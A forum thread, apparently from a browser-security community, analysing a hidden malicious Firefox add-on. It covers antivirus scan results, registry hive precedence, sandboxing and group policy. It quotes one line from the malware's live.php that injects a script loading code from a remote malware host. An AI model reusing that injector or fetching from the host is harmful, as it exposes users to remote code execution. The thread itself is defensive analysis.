RESOLVED Strange script tries to run when connection is down

[Tom T.]

Results finally back from Avira, from the sample I sent them late Friday evening 21 November 2009 (German time):

Dear Sir or Madam,

Thank you for your email to Avira's virus lab.
Tracking number: INC00399674.

We received the following archive files:
File ID Filename Size (Byte) Result
25501323 sample.zip 26.73 KB OK

A listing of files contained inside archives alongside their results can be found below:
File ID Filename Size (Byte) Result
25501324 chrome.manifest 122 Byte CLEAN
25501325 _cfg.js 1.97 KB CLEAN
25501326 overlay.xul 7.54 KB MALWARE
25501327 install.rdf 764 Byte CLEAN
25501328 live.php 308 Byte MALWARE
25501329 path.txt 197 Byte CLEAN
25501330 script attempts t...es.txt 288 Byte CLEAN
25501331 Untitled.tpp 4.39 KB CLEAN
10734900 jq.js 55.91 KB KNOWN CLEAN

Please find a detailed report concerning each individual sample below:
Filename Result
chrome.manifest CLEAN
The file 'chrome.manifest' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
_cfg.js CLEAN
The file '_cfg.js' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
overlay.xul MALWARE
The file 'overlay.xul' has been determined to be 'MALWARE'. Our analysts named the threat JS/Gord.A.1. The term "JS/" denotes a Java scriptvirus. Detection will be added to our virus definition file (VDF) with one of the next updates.

[[[Gee, thanks, guys. It's been out for only a month now -- that we *know* of. --- T.T]]]

Filename Result
install.rdf CLEAN
The file 'install.rdf' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

[[[What about the "hidden" tag, <em:hidden>true</em:hidden>, found by yours truly? Is that not malicious behavior? (Per Giorgio, this "feature" is being removed from Fx, version unknown ATM, probably 3.6 -- T. T.]]]

Filename Result
live.php MALWARE
The file 'live.php' has been determined to be 'MALWARE'. Our analysts named the threat JS/Agent.hpp. The term "JS/" denotes a Java scriptvirus.Detection will be added to our virus definition file (VDF) with one of the next updates.

Filename Result
path.txt CLEAN
The file 'path.txt' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
script attempts t...es.txt CLEAN
The file 'script attempts to access the following files.txt' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
Untitled.tpp CLEAN
The file 'Untitled.tpp' has been determined to be 'CLEAN'. Our analysts did not discover any malicious content.

Filename Result
jq.js KNOWN CLEAN
The file 'jq.js' has been determined to be 'KNOWN CLEAN'. In particular this means that we could not find any malicious content. Please note that the file is part of ''.

Alternatively you can see the analysis result here:
http://analysis.avira.com/samples/detai ... tid=399674

I'm glad that they figured out what we already figured out, after we, not they, located the files and analyzed them ourselves. And I'm glad they'll be adding it to the detection list "in the next few updates". Guess if you want something done right....

[GµårÐïåñ]

Interesting that of all the 6 different AV programs I used (all major industry players) it would only be the Microsoft Security Essentials that detected it immediately as it was downloading. Wow, a month later and they are just NOW going to add it, horrible but at least confirmed.

As for the answer to Sean's question, yes the matching keys under HKCU and HKLM are executed and parsed side by side. So if it appears in one location on either hive, then it will be counted, used and processed. The HKCU is generally where user-specific settings are kept but HKLM is generally what is global to all users (system level hive if you will) and they are both processed at all times concurrently. It should be noted that in the cases of conflicting rules in the hives that have matching variables, the HKCU (current user hive) will always override UNLESS, a BIG UNLESS, the machine is being controlled by policies pushed either locally or via active directory that prevent that force compliance with system pushed settings, then HKLM overrides and has authority.

[Tom T.]

@ SeanM: I'd like to re-emphasize something buried parenthetically in my above posting of the reply from Avira:

What about the "hidden" tag, <em:hidden>true</em:hidden>, found by yours truly? Is that not malicious behavior? (Per Giorgio, this "feature" is being removed from Fx, version unknown ATM, probably 3.6

So that should reduce the opportunity for *this particular type* of cloaking.

@ computerfreaker: Are you confusing a tin hat with a dunce cap? The "tin hat" figure of speech refers to taking extraordinary protection measures, e. g. against your brain being invaded by alien malware-beams, or, conversely, its contents read, e. g. by Van Eck Phreaking. It's an exaggeration, and sometimes used to kid people who seem *too* paranoid, but in computer safety, there's no such thing as being too paranoid.

So, IIUC, SeanM Was just saying that he'd better go into full-lockdown mode, sealing all doors and windows, etc.... expressing his (justified) concern about these vulnerabilities. Fortunately, as noted above, this one mechanism, the "hidden" tag (not a very bright idea in the first place, IMHO) is being removed from some future version of Fx.

p.s. You guys can change the topic back to "Strange Script etc.", vs. "Topic Split", or I'll change it for you. It was just cloning the headline from my post announcing the split of the Windows AV product discussion.

Edit: Changed the two posts, one by SeanM and one by computerfreaker, that had "Topic Split" as the title.

[SeanM]

Apologies if my "tin hat" reference was misinterpreted. Sometimes, humor is an interrupted defense mechanism. As I monitored this very interesting incident, the thought had arisen that malicious code might have been introduced from the Current User registry key(s), an area that is often lightly controlled. As pointed out, with correct policies and permissions, the HKLM keys can be (and should be) protected.

[Tom T.]

Apologies if my "tin hat" reference was misinterpreted.

I understood it perfectly. I don't think computerfreaker was familiar with the metaphor, that's all.

Sometimes, humor is an interrupted defense mechanism.

Sometimes, humor is an *excellent* defense mechansim! Don't interrupt it -- let it fly! ('Course, on the Net, where there aren't non-verbal cues such as body language, intonation, etc., there might be a need for a smiley. ) No worries!

[computerfreaker]

Results finally back from Avira, from the sample I sent them late Friday evening 21 November 2009 (German time):<snip>
I'm glad that they figured out what we already figured out, after we, not they, located the files and analyzed them ourselves. And I'm glad they'll be adding it to the detection list "in the next few updates". Guess if you want something done right....

Come on, you've got to be kidding. Why does it take this long for anything to happen...
The only thing they got that we missed was live.php... I thought it only redirected to innoshots, but perhaps I'm wrong on that? Any PHP coders on here?

Interesting that of all the 6 different AV programs I used (all major industry players) it would only be the Microsoft Security Essentials that detected it immediately as it was downloading. Wow, a month later and they are just NOW going to add it, horrible but at least confirmed.

I know, that's really bad. At least the MS scanner got it... score a (very begrudging) point for MS.

As for the answer to Sean's question, yes the matching keys under HKCU and HKLM are executed and parsed side by side. So if it appears in one location on either hive, then it will be counted, used and processed. The HKCU is generally where user-specific settings are kept but HKLM is generally what is global to all users (system level hive if you will) and they are both processed at all times concurrently. It should be noted that in the cases of conflicting rules in the hives that have matching variables, the HKCU (current user hive) will always override UNLESS, a BIG UNLESS, the machine is being controlled by policies pushed either locally or via active directory that prevent that force compliance with system pushed settings, then HKLM overrides and has authority.

Wow, that's no fun. I was afraid of that... even a limited account won't stop innoshots from getting away with something.

@ computerfreaker: Are you confusing a tin hat with a dunce cap? The "tin hat" figure of speech refers to taking extraordinary protection measures, e. g. against your brain being invaded by alien malware-beams, or, conversely, its contents read, e. g. by Van Eck Phreaking. It's an exaggeration, and sometimes used to kid people who seem *too* paranoid, but in computer safety, there's no such thing as being too paranoid.

So, IIUC, SeanM Was just saying that he'd better go into full-lockdown mode, sealing all doors and windows, etc.... expressing his (justified) concern about these vulnerabilities. Fortunately, as noted above, this one mechanism, the "hidden" tag (not a very bright idea in the first place, IMHO) is being removed from some future version of Fx.

In my limited experience, someone saying they'll put on a tin hat always follows a controversial post - I've come to equate it with someone putting on an "anti-flame shield", if you will. Apparently that's not correct... my bad.
Back on topic, it's good that the hidden attribute is being removed from Fx - with 2 or 3 Fx 3.6 betas out the door, does anybody know if that attribute's been removed yet?

p.s. You guys can change the topic back to "Strange Script etc.", vs. "Topic Split", or I'll change it for you. It was just cloning the headline from my post announcing the split of the Windows AV product discussion.

Edit: Changed the two posts, one by SeanM and one by computerfreaker, that had "Topic Split" as the title.

Thanks!

Apologies if my "tin hat" reference was misinterpreted. Sometimes, humor is an interrupted defense mechanism. As I monitored this very interesting incident, the thought had arisen that malicious code might have been introduced from the Current User registry key(s), an area that is often lightly controlled. As pointed out, with correct policies and permissions, the HKLM keys can be (and should be) protected.

yes, HKLM can & should be protected... too bad HKCU can't be locked down in a similar fashion without a LOT of trouble.

Apologies if my "tin hat" reference was misinterpreted.

I understood it perfectly. I don't think computerfreaker was familiar with the metaphor, that's all.

As I mentioned above, I was familiar with the phrase - just not with its correct meaning.

Sometimes, humor is an interrupted defense mechanism.

Sometimes, humor is an *excellent* defense mechansim! Don't interrupt it -- let it fly! ('Course, on the Net, where there aren't non-verbal cues such as body language, intonation, etc., there might be a need for a smiley. ) No worries!

Humor can be an excellent defense mechanism, but I tend to prefer anti-virus apps...
And yes, smilies are really important in the absence of body language, tone, eye contact or lack thereof, etc... that's why I use so many.
(Although I might have gotten a little too extreme with those... )

Happy Thanksgiving, guys!

[Tom T.]

Come on, you've got to be kidding. Why does it take this long for anything to happen...

You get what you pay for? Naah, I doubt that their paid versions caught it, either. A db is a db.
Guess they don't think that being in the anti-virus business involves anyone working on weekends? Surely no one would introduce a new virus on a weekend, would they?
FWIW, today it did flag the sample on my machine as malware when I opened it.

The only thing they got that we missed was live.php... I thought it only redirected to innoshots, but perhaps I'm wrong on that? Any PHP coders on here?

I *did* find it (cough), but reviewing my PMs, you weren't in that loop; apparently two simultaneous loops going.

Code: Select all

script=document.createElement('script');script.id="t0";script.src="http://29.innoshots.org/ffeed.php

Redirecting or fetching malicious scripts from third parties certainly constitutes malware.

Happy Thanksgiving, guys!

Ditto to all!

[Tom T.]

Wow, that's no fun. I was afraid of that... even a limited account won't stop innoshots from getting away with something.

At the risk of sounding like a broken record, some sort of effective sandbox will. (Much more effective than a limited user account.)
The one I use clones enough of a Reg hive to support the app being sandboxed (in this case, the browser). So any entries to *any* key or branch are written only to this virtual Registry -- and dumped when the sandbox is emptied. (As we know from my experience in being able to reproduce it one day and not the next.)
Your "real" Registry remains untouched.

[GµårÐïåñ]

Wow, that's no fun. I was afraid of that... even a limited account won't stop innoshots from getting away with something.

At the risk of sounding like a broken record, some sort of effective sandbox will. (Much more effective than a limited user account.)
The one I use clones enough of a Reg hive to support the app being sandboxed (in this case, the browser). So any entries to *any* key or branch are written only to this virtual Registry -- and dumped when the sandbox is emptied. (As we know from my experience in being able to reproduce it one day and not the next.)
Your "real" Registry remains untouched.

I was going to say earlier, either the sandbox or you can setup (if you know how or care to learn) to setup policy based permissions using local policy on your own profile. Then you can secure it using windows authentication and that way it will only run when YOU have logged in, executes the policy and viola done. Now if you change something mid-session and don't want to restart for it to take effect, go to your command prompt (run as admin if you are in Vista/7) and type: gpupdate -force and remember that you have user policy and machine/system policy (even as a local) so make sure the permissions are set under the right hive. To gain access to the policies, get the policy editor tool provided for 2003/2008 and install it by itself and you will get access to the console that provides the GUI but you can always just type: mmc at the command prompt, when it loads a blank one, just add them from the tools and make your own console, save it and then reuse as needed.

[Tom T.]

I was going to say earlier, either the sandbox or you can setup (if you know how or care to learn) to setup policy based permissions using local policy on your own profile. Then you can secure it using windows authentication and that way it will only run when YOU have logged in, executes the policy and viola done. Now if you change something mid-session and don't want to restart for it to take effect, go to your command prompt (run as admin if you are in Vista/7) and type: gpupdate -force and remember that you have user policy and machine/system policy (even as a local) so make sure the permissions are set under the right hive. To gain access to the policies, get the policy editor tool provided for 2003/2008 and install it by itself and you will get access to the console that provides the GUI but you can always just type: mmc at the command prompt, when it loads a blank one, just add them from the tools and make your own console, save it and then reuse as needed.

Maybe I'm just lazy , but I think running Sandboxie is easier.
(Seriously: And within the tech capabilities of many average users, while your solution, excellent though it is, is for only the very high-tech user [and a lot more work.] ) ) Cheers!

[GµårÐïåñ]

Oh yes, agreed. Playing with policies is difficult even for those who have been doing it for 20 years. Sometimes if you are engaging in a complex matrix that has inherited permissions or too many exceptions to the exceptions, you have to be careful because a lower upstream privilege could override a lower more strict one and you may not realize it, opening up a whole world of hurt. Anyway, definitely not easy or user friendly but not exclusive to the elite either, but even those make mistakes doing this, so it should be at the very least studied and kept simple until more familiar. Sandbox would be the easiest way to be honest, no matter the level of expertise; however, unfortunately in the corporate environment, you don't have that luxury and must push policy through active directory and need to control ALOT to be compliant with regulations.

[Tom T.]

.... Sandbox would be the easiest way to be honest, no matter the level of expertise; however, unfortunately in the corporate environment, you don't have that luxury and must push policy through active directory and need to control ALOT to be compliant with regulations.

Understood, and thanks for that enlightenment for corporate users.

I didn't see anything in SeanM's or computerfreaker's posts that indicated that they were dealing with a corporate environment; hence, the recommendation of the lower-tech solution. I'm sure your comments will be of value to any corporate administrators here, so thanks for sharing them.

[computerfreaker]

Come on, you've got to be kidding. Why does it take this long for anything to happen...

You get what you pay for? Naah, I doubt that their paid versions caught it, either. A db is a db.
Guess they don't think that being in the anti-virus business involves anyone working on weekends? Surely no one would introduce a new virus on a weekend, would they?

Given this thing was in the wild for close to a month before they did anything, and its relatives (the rest of the Goored family) have been in the wild for months, I'd say the weekend was long over for them. Not a pretty demonstration of AV "mobility"...

FWIW, today it did flag the sample on my machine as malware when I opened it.

That's good...

The only thing they got that we missed was live.php... I thought it only redirected to innoshots, but perhaps I'm wrong on that? Any PHP coders on here?

I *did* find it (cough), but reviewing my PMs, you weren't in that loop; apparently two simultaneous loops going.

nope, I wasn't in that particular loop. I got a couple of messages about the infection, but nothing about live.php...

Code: Select all

script=document.createElement('script');script.id="t0";script.src="http://29.innoshots.org/ffeed.php

Redirecting or fetching malicious scripts from third parties certainly constitutes malware.

I saw that in live.php, but didn't think of it as malware.... however, you're right about fetching malicious scripts.
btw, just tried manually loading that feed.php - nothing. I'm guessing I borked up the parameters I passed it... I'm not too sorry about the loading failure, though - I don't feel particularly inclined to load a live piece of malware and see what happens, even though NS is protecting me.

Wow, that's no fun. I was afraid of that... even a limited account won't stop innoshots from getting away with something.

At the risk of sounding like a broken record, some sort of effective sandbox will. (Much more effective than a limited user account.)
The one I use clones enough of a Reg hive to support the app being sandboxed (in this case, the browser). So any entries to *any* key or branch are written only to this virtual Registry -- and dumped when the sandbox is emptied. (As we know from my experience in being able to reproduce it one day and not the next.)
Your "real" Registry remains untouched.

Sure, a sandbox offers some level of protection. But it won't cover everything - what about the legit app that gets hacked? (There was actually a fairly-well-publicized case of this a few years ago - a legit Fx addon got hacked and shipped with malware. The addon author, who was completely innocent, didn't find out until 30,000 people had already downloaded it...)
I think sandboxing needs to come from the OS - I'll drop a new post in Security about this. (We've already had 2 topic splits, I don't see the need to generate a 3rd... )

I was going to say earlier, either the sandbox or you can setup (if you know how or care to learn) to setup policy based permissions using local policy on your own profile. Then you can secure it using windows authentication and that way it will only run when YOU have logged in, executes the policy and viola done. Now if you change something mid-session and don't want to restart for it to take effect, go to your command prompt (run as admin if you are in Vista/7) and type: gpupdate -force and remember that you have user policy and machine/system policy (even as a local) so make sure the permissions are set under the right hive. To gain access to the policies, get the policy editor tool provided for 2003/2008 and install it by itself and you will get access to the console that provides the GUI but you can always just type: mmc at the command prompt, when it loads a blank one, just add them from the tools and make your own console, save it and then reuse as needed.

Potent, but complex & somewhat error-prone...

Maybe I'm just lazy , but I think running Sandboxie is easier.
(Seriously: And within the tech capabilities of many average users, while your solution, excellent though it is, is for only the very high-tech user [and a lot more work.] ) ) Cheers!

Sandboxie is a lot easier, but group policies are far more potent... I reckon it depends on the user's knowledge & level of control over the system.

Oh yes, agreed. Playing with policies is difficult even for those who have been doing it for 20 years. Sometimes if you are engaging in a complex matrix that has inherited permissions or too many exceptions to the exceptions, you have to be careful because a lower upstream privilege could override a lower more strict one and you may not realize it, opening up a whole world of hurt. Anyway, definitely not easy or user friendly but not exclusive to the elite either, but even those make mistakes doing this, so it should be at the very least studied and kept simple until more familiar. Sandbox would be the easiest way to be honest, no matter the level of expertise; however, unfortunately in the corporate environment, you don't have that luxury and must push policy through active directory and need to control ALOT to be compliant with regulations.

The permissions-overriding thing's bitten me in phpBB3 before - not too hard to fix, but hard to detect in the first place. System permissions are probably even harder to set up...

I didn't see anything in SeanM's or computerfreaker's posts that indicated that they were dealing with a corporate environment; hence, the recommendation of the lower-tech solution. I'm sure your comments will be of value to any corporate administrators here, so thanks for sharing them.

I'm not in a corporate environment, so Sandboxie would work just fine for me...
My turn to sound like a broken record: Sandboxie Portable is better, since it comes from PortableApps.com...
(It's not actually an official PA.c release, but is as "clean" as one - nothing gets left on the system, AFAICT)

[Tom T.]

...Sure, a sandbox offers some level of protection. But it won't cover everything - what about the legit app that gets hacked? (There was actually a fairly-well-publicized case of this a few years ago - a legit Fx addon got hacked and shipped with malware. The addon author, who was completely innocent, didn't find out until 30,000 people had already downloaded it...)

*Nothing* covers *everything*. Hence the concept of "defense in depth". We'd hope that AV would flag the hacked app, although the confidence level in AV has dropped a good bit via this thread. But that is what our AV is supposed to be for.

If the add-on came through the Firefox Add-ons HTTPS secure connection, it almost sounds like an inside job (somebody at MZ).

Don't know what that particular malware did, but since NS blocked the innoshot code from running, there's another part of defense in depth. The malware loaded, but couldn't execute -- and NS alerted the user to it. Of course, other types of malware don't depend on scripting or other things detected by NS.

I think sandboxing needs to come from the OS - I'll drop a new post in Security about this. (We've already had 2 topic splits, I don't see the need to generate a 3rd... )

Seems like we're almost back to running a virtual machine.
IE 8 in Protected Mode is said to limit the browser's ability to make system-wide changes, but plenty of harm can be done right inside the browser.

My turn to sound like a broken record: Sandboxie Portable is better, since it comes from PortableApps.com...

That's either an advertisement or a non sequitur. I'm aware of your personal situation, and that's fine. I do find that installs on the HD run faster, but if your only option is portable, cool. Still doesn't change the fact that one form or another of sandboxing or virtualization can be an important part of "defense in depth". Cheers.

[Tom T.]

FWIW, ClamWin Portable AV apparently cannot scan inside .zip files. When the goored folder was extracted and scanned, it still was not flagged as malware. When the known malicious file overlay.xul was scanned individually, ClamWin said, "No infection found." .... so much for ClamWin, IMHO.